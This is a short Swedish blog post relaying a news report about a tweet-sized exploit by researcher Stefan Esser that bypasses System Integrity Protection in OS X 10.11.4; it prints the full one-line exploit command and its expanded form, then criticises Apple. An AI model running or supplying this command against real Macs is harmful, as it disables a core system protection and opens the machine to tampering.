Nytt säkerhetshål i OS X 10.11.4

The Hacker News:

Interestingly, Stefan Esser, a security researcher from Germany, has released a new exploit code to bypass latest patched version of SIP application, which just fits in a Tweet.
Here’s the exploit code — It can be used to modify a crucial OS X configuration file that not even root user is allowed to touch, reported The Register.

ln -s /S*/*/E*/A*Li*/*/I* /dev/diskX;fsck_cs /dev/diskX 1>&-;touch /Li*/Ex*/;reboot

The above code actually expands to:
ln -s /System/Library/Extensions/AppleKextExcludeList.kext/Contents/Info.plist /dev/diskX
fsck_cs /dev/diskX 1>&-
touch /Library/Extensions/
The above exploit code successfully bypasses Apple’s SIP technology, allowing one to run processes as it is pleased.
Apple måste tajta upp detta rejält. Det finns ingen ursäkt för sånt här.
(Och om du testar detta på din Mac: du gör det på egen risk. Testa inte på någon annans Mac.)




© 2021 Omsoc Publishing AB